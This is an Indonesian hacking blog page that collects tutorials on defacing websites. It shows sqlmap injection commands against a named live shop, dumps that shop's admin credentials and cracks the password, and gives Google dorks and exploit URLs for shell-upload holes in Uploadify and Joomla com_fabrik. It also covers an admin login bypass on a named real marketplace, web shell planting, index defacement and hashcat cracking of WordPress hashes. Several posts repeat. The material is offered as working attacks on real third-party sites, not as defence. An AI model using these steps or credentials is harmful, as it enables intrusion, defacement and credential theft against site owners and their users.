Tampilkan postingan dengan label Defacing. Tampilkan semua postingan
Assalamualaikum Wr, WB,
maaf yah om om sekalian, ane lama gak buat threat baru, nah sekarang mumpung ada waktu ane share nih cara deface website dengan SQLMAP di Backtrack 5 :D
Apa itu SQLMap ?
SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
Sekarang tanpa basa-basi lagi kita mulai injeksi dengan sqlmap.
[+] BAHAN [+]
- Python [tonjok saya]
- Sqlmap [remas saya]
[+] LANGKAHNYA MBAH BRO [+]
1. Setelah instal python, sekarang kalian extrack SQLMAPnya di Drive C:, setelah di extrack buka CMD lalu ketikan :
- cd\sqlmap\ , maka hasilnya akan seperti ini :
2. Stelah itu, kalian mulailah scan website target dengan perintah :
- sqlmap.py -u http://www.BUGWEBTARGET.com --dbs
Contoh Target : sqlmap.py -u http://vana-shop.com/product.php?c=1 --dbs , klik [ENTER]
3. Tuh kan keliatan DATABASE nya :D , sekarang waktunya kita scan dengan perintah :
Contoh Target : sqlmap.py -u http://vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables , maka hasilnya akan seperti ini :
4. Nah keliatan kan Table di databasenya ? nah sekarang kita scan table tersebut (*cari yang menurut kalian terdapat info tentang user dan pass website) kalo udah yakin disana ada infonya, ketikan perintah :
- sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns
Contoh Target : sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --columns , tekan enter maka hasilnya akan seperti ini :
5. Nah setelah keliatan Tabelnya sekarang kita ketikan perintah :
- sqlmap.py -u http://www.target.com -D nama_database -T nama_table --dump
Contoh Target : sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --dump , klik enter
Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip" :
- do you want to crack them via a dictionary-based attack? [Y/n/q]
Maka Hasilnya akan seperti ini :
nah itu kita dapetin User + Passwordnya :D
User : admin
Pass : dfc560ef836a9a63c2bdbfb24a683624
Nah gimana tuh passwordnya kok aneh ? sekarang tugas kalian pecahin itu md5nya caranya pergi ke :
Nah setelah saya Decrypt ane dapetin nih :
Pass : dfc560ef836a9a63c2bdbfb24a683624 :: myluckyshop$
Sekarang tinggal login ke admin dan tebas deh :D
HASIL :
masih kena deface tuh : http://www.vana-shop.com/
dah yah sekian dulu Postingnya, ane males ngetik lagi KWOKWOWK XD
Sama kan kayak make BACKTRACK 5 :D
Semoga berhasil :)
Content Creator : Bimo Septiawan a.k.a Cyber404
Rating: 4.5
Reviewer: Unknown
ItemReviewed: Deface Dengan SQLMAP di WINDOWS 7
Assalamualaikum Wr, WB,
maaf yah om om sekalian, ane lama gak buat threat baru, nah sekarang mumpung ada waktu ane share nih cara deface website dengan SQLMAP di Backtrack 5 :D
Apa itu SQLMap ?
SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
Sekarang tanpa basa-basi lagi kita mulai injeksi dengan sqlmap.
[+} BAHAN [+]
User : admin
Semoga berhasil :)
maaf yah om om sekalian, ane lama gak buat threat baru, nah sekarang mumpung ada waktu ane share nih cara deface website dengan SQLMAP di Backtrack 5 :D
Apa itu SQLMap ?
SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
Sekarang tanpa basa-basi lagi kita mulai injeksi dengan sqlmap.
[+} BAHAN [+]
- Python [windows download]
- Sqlmap [windows download]
[+] LANGKAHNYA MAS BRO [+]
(*Untuk Windows kalian cari dulu ke sini )
1. Kita cari dulu target yang mau kita scan (*jika ada bugs akan seperti ini)
2. Buka dulu SQLMAPnya, kalo di Backtrack 5 ketikan printah
- /pentest/web/scanners/sqlmap /
3. Ketikan printah ini :
- python ./sqlmap.py -u http://www.BUGWEBTARGET.com --dbs
setelah itu klik enter, maka akan muncul Database Target (*See Image)
4. Setelah dapet nama Data Basenya kita ketikan printah :
- python ./sqlmap.py -u http://TARGET.com -D nama_database -tables
Contoh target saya : python ./sqlmap.py -u http://vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables [tekan enter] hasil :
5. Setelah dapat table pada databasenya silahkan cari table yang menurut kalian ada USER + PASS website tersebut, kali ini saya coba scan TABLE USER, dengan perintah :
- python ./sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns
6. Setelah itu kita scan lagi table itu untuk mendapatkan user dan pass admin website, dengan perintah :
- python ./sqlmap.py -u http://www.target.com -D nama_database -T table --dump
Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip"
- do you want to crack them via a dictionary-based attack? [Y/n/q] maka hasilnya :
nah itu kita dapetin User + Passwordnya :D
User : admin
Pass : dfc560ef836a9a63c2bdbfb24a683624
Nah gimana tuh passwordnya kok aneh ? sekarang tugas kalian pecahin itu md5nya caranya pergi ke :
Nah setelah saya Decrypt ane dapetin nih :
Pass : dfc560ef836a9a63c2bdbfb24a683624 :: myluckyshop$
Sekarang tinggal login ke admin dan tebas deh :D
HASIL :
masih kena deface tuh : http://www.vana-shop.com/
dah yah sekian dulu Postingnya, ane males ngetik lagi KWOKWOWK XD
Semoga berhasil :)
Content Creator : Bimo Septiawan a.k.a Cyber404
Rating: 4.5
Reviewer: Unknown
ItemReviewed: Deface Dengan SQLMAP di Backtrack 5
Assalamualaikum.. :)
Hay Sobat, ketemu lagi dahh :D Pernah liat yg seperti dibawah ini? :D
$P$B12345678SK.X5r1iISZN0baAvEvEj0
$P$B12345678ZiFnCoy7w6GTPrB3CkpqJ0
$P$B12345678WCBznPM8xM5iD8Z.SLgTx/
$P$B123456784oLOGhf1nRTZQ/lvWT8mc0
$P$B12345678JC/b3vIsxnmQm5u2XkFKq.
$P$B12345678ZiFnCoy7w6GTPrB3CkpqJ0
$P$B12345678WCBznPM8xM5iD8Z.SLgTx/
$P$B123456784oLOGhf1nRTZQ/lvWT8mc0
$P$B12345678JC/b3vIsxnmQm5u2XkFKq.
Nah, ane sekarang mau share tentang trik bagaimana ngecrack password hash yang digunakan pada web yg menggunakan CMS Wordpress. Soalnya ane liat banyak sekali yang masih bingung bagaimana caranya bahkan ga tau sama sekali tentang password hash wordpress. berbeda dengan password hash MD5 rata2 tools decript/crack nya udah bertebaran dimana-mana baik offline maupun online.
Saran ane kalo mau bisa crack password hash harus tau dulu jenis-jenis hash tersebut. silahkan sobat cari dah di google banyak berserakan :D banyak baca banyak ilmu :p
Cukup dah ngomel ngomelnya :D langsung ke TKP :D
Sediakan Bahan - Bahan :
1. Hashcat | Download
2.Wordlist | Download | Download
3.Sedikit Otak, dan Kesabaran :p
Langkah - Langkah:
Pertama extrack file hashcat dan wordlist dipartisi disk yg sobat inginkan, kalo ane disini ane letak di partisi D:\ liat gambar baik2 tuh :D

Lalu buka Hashlist.txt dan masukkan Hash yg mau sobat crack, dan save lagi :D
Selanjutnya buka terminal command, cari aja di Start>Run>ketik cmd! dan enter!
Setelah terminal terbuka, posisikan directori ke folder D:\Hashcat. liat gambar!
Selanjutnya ketik perintah : hashcat-cli32.exe -m 400 hashlist.txt wordlist.txt lalu enter!
Silahkan sobat tunggu beberapa tahun yah :D eh, beberapa saat :D tunggu ampe selesai aja ;)
Nah tuw, udah keluar hasilnya :
$P$B12345678SK.X5r1iISZN0baAvEvEj0:l4I2GL4HsK7Tw
$P$B12345678ZiFnCoy7w6GTPrB3CkpqJ0:r3dm0nd_admin
$P$B12345678WCBznPM8xM5iD8Z.SLgTx/:4dm!n_w38
$P$B123456784oLOGhf1nRTZQ/lvWT8mc0:w38m45t3r
$P$B12345678JC/b3vIsxnmQm5u2XkFKq.:!nd0n3s!4n_cy83r_4rmy
Note: "Biar lebih maknyoooss, banyakin aja wordlistnya :D punya ane ampe 1 GB :3"
Jika sobat ingin meggunakan perintah2 yg lain atau mau coba crack hash jenis yg lain, silahkan sobat ketik perintah : hashcat-cli32.exe --help
Sekian tutorial singkat dari ane, kalo ada yg kurang mohon dikoreksi, ntar ane perbaiki :D
Wasalamualaikum..
Contet Creator: Onix AQua
Rating: 4.5
Reviewer: Unknown
ItemReviewed: Crack Hash MD5(wordpress) dengan Hashcat
Cara Mudah Deface Dengan Upload Shell | Shell Upload Vulnerability
Minggu, 31 Maret 2013
Posted by Unknown
Tag :
Defacing,
Website Attack
Assalamualaikum...
Salam Sejahtera bagi kita semua,,,
Okey sobat IDCA, masih bersama ane admin terbaik sejagad,, hajiahh :D yup, kali ini saatnya berbagi lagi... daripada ga ada kerjaan, mending bagi bagi ilmu aja :D
Pada tutorial ini sama dengan CSRF, cuma sedikit berbeda caranya saja, disini ane gunain OS Backtrack, ane udah coba pake Windows, tapi ribet!! >.< Silahkan sobatcoba2 aja gunain Windows OS, tapi kalo ada masalah nantinya silahkan di solving sendiri yah.. wokwokwok :D
Bahan - Bahan :
1. Script Upload.php | Download
2. Google Dork: inurl:"/wp-content/themes/Brainstorm/"
#Silahkan Dork dikembangkan lagi
3. Live Target : Lihat1 & Lihat2
Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Langkah - Langkah :
1. Pertama cari dulu target dengan menggunakan Dork..
2. Disini ane udah nemuin targetnya.. dan langsung aja cari upload.php nya
Penting! Kalo halaman menjadi kosong, ada kemungkinan exploit bisa dijalankan!
3. Sebelumnya letakkan file Uploadify.php dan Shell sobat di folder /var/www/
4. Lalu edit dulu Uploadify.php dengan Notepad, silahkan dirubah yg ane kasi tanda panah seperti Link target, nama file dan folder! Lalu Save kembali..
5. Selanjutnya Buka terminal dan jalankan Apache dengan ketikkan perintah: /etc/init.d/apache2 start lalu enter!
6. Kemudian ketik perintah berikut diterminal : cd /var/www/ lalu enter!! lalu ketik lagi perintah: php uploadify.php lalu enter! dan silahkan sobat tunggu hasilnya!
7. nah tuh, shell telah berhasil diupload ke web,, selanjutnya tinggal eksekusi shell dan Tebas index web.. wokwokwok :D
Note: Ga semua hasilnya sama begitu,, kalo ga nampil seperti gambar, silahkan sobat cari dimana letak shell sobat :D
Good Luck!!!!! :p
Content Created By Onix AQua
Rating: 4.5
Reviewer: Unknown
ItemReviewed: Cara Mudah Deface Dengan Upload Shell | Shell Upload Vulnerability
Assalamualaikum....
Salam kompak Sobat IDCA,
Lanjut lagi Walking Blogg :D
Nah, kali ini saya cuma mau berbagi saja tentang Exploit Joomla, walaupun ini bugs lama, tapi masih bisa juga digunakan untuk depes2,, wkwkwk :D
Sebelumnya sedikit Nasihat dari saya :
"Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Oke, langsung aja... Berikut langkah2nya:
Live Target: http://sercaca.com/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=1&Itemid=0
1. Gunakan Dork untuk mencari Target di Google
inurl:index.php?option=com_fabrik
2. Selanjutnya Pilih target sobat, disini ane udah nemu target... langsung aja di eksploitasi :D
3. Masukin exploitnya berikut;
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
maka akan muncul halaman upload seperti gambar berikut:
Note: Kalo tidak muncul halaman seperti gambar atau error, silahkan cari target yg lain! :p
4. upload shell sobat, klik Browse dan pilih shell sobat lalu klik Import CSV
5. Setelah itu lihat hasil upload shell sobat di http://site.com/media/shell.php
Note: Kalo ga berhasil atau error, cari target lain aja :D
7. Goodluck! :p
Video Tutorial
Content Created By Onix AQua
Rating: 4.5
Reviewer: Unknown
ItemReviewed: Deface Dengan Exploit Joomla | com_fabric
Gambaran Web Attack :
Scan => Exploitasi => Upload Shell => Deface/Jumping => Rooting
1. Scan
Cari tau dimana letak kelemahan web target. Bisa di scan pake beberapa tool scanner. Diantar'a yang paling terkenal :
# Acunetix (Windows)
# Nikto (Linux)
Selain dapat mendapatkan bug kita juga dengan tool itu akan dapat mengumpulkan informasi berguna dari web target.
2.Exploitasi
Setelah kita dapat menemukan data dari web target. Kita coba cari cara untuk meng-Exploitasi bug-bug yang sudah kita temukan dengan tool scanner tadi. Di bawah ini daftar situs yang menyediakan macam-macam Exploit :
# Exploit Database
# Packet Storm
# Inj3ct0r
# Hack0wn
Apabila target menggunakan CMS Joomla/Wordpress, kita dapat mencari Exploit untuk plugin-plugin yang di gunakan web target. Karena dengan tool scanner di atas kita diberikan informasi seakan-akan web target sudah di bedah keseluruhan'a. Jadi kita tahu isi folder dari web target, termasuk plugin-plugin apa saja yang digunakan.
3. Upload Shell
Website sudah bisa di Exploitasi dan kita sudah bisa masuk ke halaman admin. Tinggal kita upload shell'a sekarang ;
- Upload shell di Wordpress bisa mengupload plugin or thema yang sudah disisipi file shell'a.
- Upload shell di Joomla juga sama, cuma bisa juga menggunakan Plugin Ninja Explorer
- Upload Shell di CMS biasa bisa melalui menu upload gambar, kalau tidak bisa coba shell'a di rename menjadi shell.php.jpg lalu upload.
Setelah shell berhasil di upload tinggal panggil letak URL shell'a dimana.
4. Deface or Jumping
Kalau pengen gaya-gaya an (Deface), cari file index.php lalu rubah file di dalam'a dengan script Deface yang kita punya. Bagi yang malas bikin scrip deface dapat menggunakan tool ; DefaceMaker. Coba arshive kan website yang sudah kita deface di situs :
- Indonesian Defacer
- Magelang Cyber
- Zona-H
Tidak cukup hanya bisa men-Deface satu web saja. Coba gunakan teknik jumping untuk masuk ke web yang satu server sama web yang telah kita deface.
Sumber:: Hacker Newbie
Rating: 4.5
Reviewer: Unknown
ItemReviewed: Alur Web Attack
Assalamualaikum ^o^
Kali ini ane mau share nih sedikit tips Bypass Login tanpa main Insect Element ^o^, Oke langsung saja males ngetik banyak banyak wkwkkwk :D
Kalau belum tau cara manualnya kalian baca dulu disini
1. Masuk ke halama awal target
.jpg)
.jpg)
.jpg)
Kali ini ane mau share nih sedikit tips Bypass Login tanpa main Insect Element ^o^, Oke langsung saja males ngetik banyak banyak wkwkkwk :D
Kalau belum tau cara manualnya kalian baca dulu disini
1. Masuk ke halama awal target
.jpg)
2. Disini Targetnya adalah https://www.niche-marketplace.net, nah caranya gampang kok, kalian tinggal masukin Exploit berikut :
Exploit : /admin/index.php?flag=2
Jadi tinggal tulis deh di addresbar kayak gini www.target.com/admin/index.php?flag=2
EX : https://niche-marketplace.net/admin/index.php?flag=2
3. Nanti penampakannya jadi kayak gini, tinggal klik login aja deh :D
.jpg)
4. Selamat anda sudah masuk ke website tersebut ^_^
.jpg)
5. Dah tuh tinggal di hajar aja wkwokowow caranya.
wkokowkow
Sekian tutorial singkat dari ane :D
NB : jika di addresbar keluar tulisan flag=1 itu tandanya tidak bisa di kipulin wkwkwk
NB : jika di addresbar keluar tulisan flag=1 itu tandanya tidak bisa di kipulin wkwkwk
Content Creator : Bimo Septiawan.
Rating: 4.5
Reviewer: Unknown
ItemReviewed: Bypass Login Tanpa Inspect Element
Assalamualaikum....
Halo sobat,, sekarang cuma mau berbagi Tools aja, kalo lagi males biasanya ane pake ini saat melakukan exploitasi, maklum ane cuma Blogger Newbie, kalo yg master Hacker mah biasanya Manual :3
WAppEx ( Web Application Exploiter ) buatan om R3dm0ve ( Persian hacker ) sebuah tool's yg cukup lengkap didalamanya ada beberapa tools gabungan untuk melakukan pentest sebuah website.
Feature:
- SQL Injection
- OS Command Execution
- Script Injection
- Local File Inclusion
- Remote File Inclusion
- Local File Disclourse
Cara Install:
Install dulu sampe selesai, lalu copy dan pastekan file crack di C:\Programfiles\WappEx
Content Creator : Onix AQua
Rating: 4.5
Reviewer: Unknown
ItemReviewed: Web Application Exploiter (WappEx) Full Crack
Cara Tebas Index Website CMS Joomla
Senin, 11 Maret 2013
Posted by Unknown
Tag :
Defacing,
Website Attack
Assalamualaikum ..
Ketemu lagi dengan tutorial semrawut dari ane ^o^, yoo kali ini ane mau share nih cara tebas INDEX dari CMS Joomla :D
Mengingat di Group masih banyak teman teman yang bertanya cara Tebas Index Joomla :D
Yuk, basa basinya udahan kowkowkwk .
Oke simak dulu yah, nanti kalo belum faham baru tanya di Groups, atau di komentar ^_^
Saya anggap kalian udah ada live targetnya yah, kalo belum bisa dibaca disini
Oke langsung saja kita mulai.
1. Kalian Klik Icon "TEMPLATE MANAGER" (see image)
Sekian tutorial singkat dari saya :D. jika kurang jelas bisa kalian tanyakan kok :p
Content Creator By : Bimo Septiawan
tag : deface joomla , deface index . cara mudah deface index , exploit joomla
Ketemu lagi dengan tutorial semrawut dari ane ^o^, yoo kali ini ane mau share nih cara tebas INDEX dari CMS Joomla :D
Mengingat di Group masih banyak teman teman yang bertanya cara Tebas Index Joomla :D
Yuk, basa basinya udahan kowkowkwk .
Oke simak dulu yah, nanti kalo belum faham baru tanya di Groups, atau di komentar ^_^
Saya anggap kalian udah ada live targetnya yah, kalo belum bisa dibaca disini
Oke langsung saja kita mulai.
1. Kalian Klik Icon "TEMPLATE MANAGER" (see image)
2. Lalu klik "template" (see image)
3. Lalu pilih template yang aktif di website tersebut.
4. Lalu klik "Edit Main Page Template" (see image)
5. Lalu pastekan "Shell/Script" kalian di kolom yang tersedia :D
#WARNING : Back Up dulu script asli website tersebut ^o^6. Jeng jenggggggg !!!! sekarang cek deh hasilnya di Index websitenya ^_^
NB : Jika gagal, maka ulangin lagi dari step ke-3 :)
Sekian tutorial singkat dari saya :D. jika kurang jelas bisa kalian tanyakan kok :p
Content Creator By : Bimo Septiawan
tag : deface joomla , deface index . cara mudah deface index , exploit joomla
Rating: 4.5
Reviewer: Unknown
ItemReviewed: Cara Tebas Index Website CMS Joomla
Cara Mudah Deface Website Dengan Bypass Admin Login | Free Monthly Websites 2.0 Multiple Vulnerabilities
Sabtu, 09 Maret 2013
Posted by Unknown
Tag :
Defacing,
Website Attack
Assalamualaikum....
Salam kompak sobat2 IDCA, ^_^
Tidak ada bosan2 nya ane mau share tentang depes2an,, soalnya lagi marak dan bnyak banget yg menyukai aktivitas ini, yah walaupun beresiko masuk BUI,, wkwkwk :p
Langsung aja lah, males ngetik banyak2! :p
Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
kali ini ane mau share tentang teknik Bypass Halaman Login Administrator! Bagaimana caranya? Yuk simak aja rame rame,, hehhehe ;)
Bahan Bahan :
Dork: inurl:/index_info.php Lihat Dork yg lain Disini
Live Target : http://niche-marketplace.net/index_info.php
Note: "Mohon Live Target Jangan Dirusak, karena untuk pembelajaran bersama, kalo udah bisa cari aja target yang lain!"
Langkah Langkahnya:
Cari Target Google.com dengan menggunakan Dork, disini ane dapet target http://niche-marketplace.net/index_info.php
Lalu masuk ke halaman login admin! biasanya letaknya site.com/admin/index.php atau bisa jadi site.com/[path]/admin/index.php kalo target ane : http://niche-marketplace.net/admin/index.php
Setelah itu kita lakukan Inspect Elemen! dengan cara klik kanan, lalu pilih Inspect Element!
Lalu akan muncul seperti gambar dibawah! yang perlu kita lakukan adalah mencari Source code berikut :
Ganti "hidden" dengan "text" lalu akan muncul kotak label "admin_settings_read" ganti read menjadi write! lihat gambar!
Lalu tekan Enter!
Klik Login aja!
Note: "Kalo ada muncul pesan seperti digambar, berarti target vuln ato bisa di depes! Selain itu ga bisa, cari target lain! :p
Duaaarrrrrrrrr!! Udah masuk? Mantap! Trus mo ngapain lagi?? udah gitu aja! wkwkwkwk :p
Trus Tebas index nya gimana gan?? Hajiahhh,, :3 makanya baca tutorial ampe abis dulu, dipahami dan dipelajari baru dipraktekin.. hadeewwhhh!!
Oke, sekarang kita udah masuk ke halaman admin, saatnya kita tanem Shell! Apa itu Shell?? Baca lagi sono di postingan ane Apa itu WebShell :p Disini ane make Madspotshell!
WAJIB!!! Harap diperhatikan dan dicermati baik baik, jika ada sedikit kesalahan maka Shell sobat yg ditanem akan Gagal dieksekusi! dan akhirnya balik maning ke awal :p
Pertama gulirkan kebawah! cari menu "Add/Remove Navigation Page"
Klik Add/Remove Navigation Page! Lalu ketik nama shell.php sobat, kalo ane mah "idca.php". Untuk lebih jelasnya liat gambar!
Lalu klik "Add New Navigation"
Setelah itu masih dihalaman yg sama, liat kebawah sampai menemukan kalimat: "Sort Page Buttons/links" trus ubah "idca.php.html" jadi "/idca.php". liat gambar!
Lalu klik "Sort Navigation Pages"!
Selanjutnya cari Menu "Edit Navigation Pages" lalu klik menu tersebut. Kemudian pada kolom "Please Select a Pages To Edit" lalu pilih "idca.php.html". disini kita akan melakukan Inspect Element lagi, lalu cari kata "idca.php.html" dan ubah jadi "idca.php". Lihat gambar!
Kemudian masih dihalaman yg sama, gulirkan kebawah!
Pada kolom "Enter A Page Title As You Would Like To Be Seen" ketik "idca.php"
Pada kolom "URL For This Site" ketik "main_pages/idca.php"
Pada kota box, ceklis/centang ketiganya. untuk lebih jelas, lihat gambar!
Selanjutnya masih juga di halaman yg sama, gulirkan kebawah! Pada kolom "Enter Content for Your Pages" pilih "Source" lalu editor akan aktif!
Buka shell Backdoor (madspotshell.php) dengan notepad untuk dipaste kan ke Konten Pages!
WAJIB DIPERHATIKAN, karena menentukan keberhasilan!
Sebaiknya Shell Backdoor jangan diberi password!
Jadi nanti seperti ini cara nulisnya.
<Line kosong>
<Line kosong>
{ Isi Kodingan PHP Shell dari awal sampai akhir }
<Line kosong>
<Line kosong>
Yap di Line awal diisikan ruang kosong 2x (alias teken enter 3x) dan di Line akhir diisikan ruang kosong 2x (alias teken enter 3x). Kurang jelas? lihat gambar :
lalu
Lalu klik Save! akan muncul pesan seperti gambar berikut!
Selanjutnya saatnya kita buka shell backdoor yg udah kita tanem! caranya tulis diadress bar: http://site.com/main_pages/Nama File Backdoor.php Liat gambar!
Huft! Akhirnya Selesai dan Berhasil tuh! Tinggal tebas index aja! wkwkwk
Harap Live Target ini jangan di Tebas om! Buat aja file baru!Atau Cari Target Lain!
Untuk yg belum mengerti cara tebas index web, silahkan Baca Cara Tebas Index Web
Content Creator By Onix AQua
Tag : deface mudah, cara deface mudah , deface index website, cara deface website
Rating: 4.5
Reviewer: Unknown
ItemReviewed: Cara Mudah Deface Website Dengan Bypass Admin Login | Free Monthly Websites 2.0 Multiple Vulnerabilities


















.bmp)
.bmp)
.bmp)
.bmp)
.bmp)
.jpg)

.bmp)

.bmp)
.bmp)








.jpg)
.jpg)
.jpg)
.jpg)
.jpg)
.jpg)
.jpg)
.jpg)

.jpg)
.jpg)
.jpg)
.jpg)
.jpg)